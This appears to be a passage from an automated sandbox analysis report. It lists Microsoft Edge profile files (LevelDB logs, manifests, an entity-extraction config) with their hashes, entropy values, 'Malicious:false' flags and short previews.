                                                                                                                                                                                                                                                                                                SSDEEP:24:TLqpR+DDNzWjJ0npnyXKUO8+jl+CpHrmL:Te8D4jJ/6Up+U
                                                                                                                                                                                                                                                                                                MD5:4577310C15E691458E1CFE28DCA41DA1
                                                                                                                                                                                                                                                                                                SHA1:A1757E3D34B297B8CD56A5D057D8E080C71F9AF7
                                                                                                                                                                                                                                                                                                SHA-256:0A10BD3C43CEEC2605D0E9F3DFB9D31C66BD34C03E361FBBD4EB095BFB72831D
                                                                                                                                                                                                                                                                                                SHA-512:FAC7988525151D715F23C3B41689414A3B95132A010072063BAF1952F4B526CB74462DC4C4A5703CE02384CB0E3D952EC25BFEB57A0B00DC13F3E6DA5935152D
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j...%.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000001.dbtmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000003.log

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):375520
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.354132423343155
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6144:oA/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:oFdMyq49tEndBuHltBfdK5WNbsVEziPU
                                                                                                                                                                                                                                                                                                MD5:FAF6F854B35D5FEDFE1F105ACE93663B
                                                                                                                                                                                                                                                                                                SHA1:0699FD977A4665ACE21A1AB05E68622B102A91B9
                                                                                                                                                                                                                                                                                                SHA-256:D0CA525825B3BD21B4DE74827B92A5A9B7898630538AF0DC90D16D87F27AD6AB
                                                                                                                                                                                                                                                                                                SHA-512:99461DFACE094DE18219D30ED5A289D23FE0A8165723ED8C936936069A0C2DEC7A75D349175B3562DC70D6890506BE3D3B845E2B41D7AF4C60A6E3A305E2630F
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:...m.................DB_VERSION.1%...q...............&QUERY_TIMESTAMP:domains_config_gz2.*.*.13385951021391364..QUERY:domains_config_gz2.*.*..[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\CURRENT (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\LOG

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):309
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.191292692419358
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:iOvbRRM1wkn23oH+Tcwtk2WwnvB2KLlNuXMq2Pwkn23oH+Tcwtk2WwnvIFUv:7TRRrfYebkxwnvFLmMvYfYebkxwnQFUv
                                                                                                                                                                                                                                                                                                MD5:483B303B3885BB35DF6731659CD5EF51
                                                                                                                                                                                                                                                                                                SHA1:2D2D9442846DE7122C6B3C0E92231F91CD71B414
                                                                                                                                                                                                                                                                                                SHA-256:27345029B657799D62AA83EDE622F42B27B710A7E3D6FE8DAB7702E2F9C0BB16
                                                                                                                                                                                                                                                                                                SHA-512:F2BFF445EAC8825DA5351DFBE153A73640055AD7AFDBC7A675C2DF8918562DDCD3C3F44FC94ACD61D1675F18F7A231CD0AC0F8D2C272FF8BA74C8B6B8174237D
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2025/03/08-18:43:38.045 22b4 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2025/03/08-18:43:38.292 22b4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\MANIFEST-000001

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):41
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\domains_config.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                                                                Size (bytes):358860
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.324608110858955
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6Ru:C1gAg1zfvW
                                                                                                                                                                                                                                                                                                MD5:5B573449973CD17C1EDF539264C6A8CB
                                                                                                                                                                                                                                                                                                SHA1:2FC81FB7EC4A00AC5C7BEB12C61BAC1710A5B695
                                                                                                                                                                                                                                                                                                SHA-256:C0D1492521A3B0BC10529425F836C3315F3AA458361AE426726DBC005A4F96F3
                                                                                                                                                                                                                                                                                                SHA-512:5C7DEC9906D39ED9DCB802B1C15275D528989A64425AAB2D6E8AC04D288EA210CDDFB454B0329CF4FDFE105AAE9A3CF9FB729539C38B0CE600CF2E181ECC75C3
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"aee_config":{"ar":{"price_regex":{"ae":"(((ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)))","dz":"(((dzd|da|\\x{062F}\\x{062C})\\s*\\d{1,3})|(\\d{1,3}\\s*(dzd|da|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}|egp)\\s*\\d{1,3})|(\\d{1,3}\\s*(e\\x{00a3}|egp)))","ma":"(((mad|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(mad|dhs|dh)))","sa":"((\\d{1,3}\\s*(sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633}))|((sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633})\\s*\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})|(\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\000001.dbtmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\000003.log

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):209
                                                                                                                                                                                                                                                                                                Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:FQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlX:qTCTCTCTCTCTCTCTCTCTCT
                                                                                                                                                                                                                                                                                                MD5:478D49D9CCB25AC14589F834EA70FB9E
                                                                                                                                                                                                                                                                                                SHA1:5D30E87D66E279F8815AFFE4C691AAF1D577A21E
                                                                                                                                                                                                                                                                                                SHA-256:BB6CC6DF54CF476D95409032C79E065F4E10D512E73F7E16018E550456F753D5
                                                                                                                                                                                                                                                                                                SHA-512:FB5431054A23D3C532568B1F150873D9130DBC4A88BE19BC2A4907D0DC2888C5B55993154EAD4A6C466E2173092B8705684A6802B850F051639E1F2457387471
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\CURRENT (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):279
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.206975701116886
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:iOvk81wkn23oH+Tcwt8aVdg2KLlNo+q2Pwkn23oH+Tcwt8aPrqIFUv:7UfYeb0LJvYfYebL3FUv
                                                                                                                                                                                                                                                                                                MD5:10013240038D34A37EF5DD2275A9D1D7
                                                                                                                                                                                                                                                                                                SHA1:4422A882006248461B1D590F1CE78D5466B17604
                                                                                                                                                                                                                                                                                                SHA-256:9FB422BD0BCDF75AFE073EEA7D50F9068A38660D9A3040C562CCE2BB57071DFF
                                                                                                                                                                                                                                                                                                SHA-512:1DB0964A50E4DBC68F0F7102188215358BD316A1A051F8CECD0CA6D785B75756F73D105F627320F3F4DC08D3A24BE0512ED2CB4EEA6237376D788FD8229DE1A5
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2025/03/08-18:43:29.766 c28 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules since it was missing..2025/03/08-18:43:29.813 c28 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\MANIFEST-000001

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):41
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\000001.dbtmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\000003.log

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):209
                                                                                                                                                                                                                                                                                                Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:FQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlX:qTCTCTCTCTCTCTCTCTCTCT
                                                                                                                                                                                                                                                                                                MD5:478D49D9CCB25AC14589F834EA70FB9E
                                                                                                                                                                                                                                                                                                SHA1:5D30E87D66E279F8815AFFE4C691AAF1D577A21E
                                                                                                                                                                                                                                                                                                SHA-256:BB6CC6DF54CF476D95409032C79E065F4E10D512E73F7E16018E550456F753D5
                                                                                                                                                                                                                                                                                                SHA-512:FB5431054A23D3C532568B1F150873D9130DBC4A88BE19BC2A4907D0DC2888C5B55993154EAD4A6C466E2173092B8705684A6802B850F051639E1F2457387471
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\CURRENT (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):283
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.1722624808379285
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:iOvgR1wkn23oH+Tcwt86FB2KLlNE+q2Pwkn23oH+Tcwt865IFUv:7o0fYeb/FFLVvYfYeb/WFUv
                                                                                                                                                                                                                                                                                                MD5:59D0BE229E2AC99129AA767546FA71E5
                                                                                                                                                                                                                                                                                                SHA1:9521D23EFA4241C5C771718DA51250825614280B
                                                                                                                                                                                                                                                                                                SHA-256:8065B26C8E70BF1C56FCD906AD73C0EA487718DBCFEA8F1331B1DC08147001D7
                                                                                                                                                                                                                                                                                                SHA-512:FF4ED7054D6B765A2392881D51F39E27788AFFAC11B4234BA8512F28258DB2811C03B61831021FF627DDC80001A941B9BE4506D67FE24A6A169D73EB886CD9A6
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2025/03/08-18:43:29.817 c28 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts since it was missing..2025/03/08-18:43:29.831 c28 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\MANIFEST-000001

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):41
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\000003.log

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1197
                                                                                                                                                                                                                                                                                                Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW:
                                                                                                                                                                                                                                                                                                MD5:A2A3B1383E3AAC2430F44FC7BF3E447E
                                                                                                                                                                                                                                                                                                SHA1:B807210A1205126A107A5FE25F070D2879407AA4
                                                                                                                                                                                                                                                                                                SHA-256:90685D4E050DA5B6E6F7A42A1EE21264A68F1734FD3BD4A0E044BB53791020A2
                                                                                                                                                                                                                                                                                                SHA-512:396FAB9625A2FF396222DBC86A0E2CDE724C83F3130EE099F2872AED2F2F2ECE13B0853D635F589B70BD1B5E586C05A3231D68CAF9E46B6E2DAC105A10D0A1C8
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):322
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.1425679852176085
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:iOvOTF34q2Pwkn23oH+Tcwt8NIFUtdOWPBJZmwrOWPBDkwOwkn23oH+Tcwt8+eLJ:7GTOvYfYebpFUtsWPr/6WPh5JfYebqJ
                                                                                                                                                                                                                                                                                                MD5:EAA283E770C83B26E2D90D6CA445A2CE
                                                                                                                                                                                                                                                                                                SHA1:44BB6D4A797346E97AEF21620395110A82B370CA
                                                                                                                                                                                                                                                                                                SHA-256:5E3E843C261F8DBD6E8C6BBD492611C8D68CF171ED5CD0B0B78C2DFE8EFE1163
                                                                                                                                                                                                                                                                                                SHA-512:294B31E29C2AFDAFACAEC162089D64AB48A4D645F6014B189A0867911B1921FACF6E7AE4832A9A4C358F1C160D21E2DA1C2BB1E951F2A11DFD0546D5A47819DC
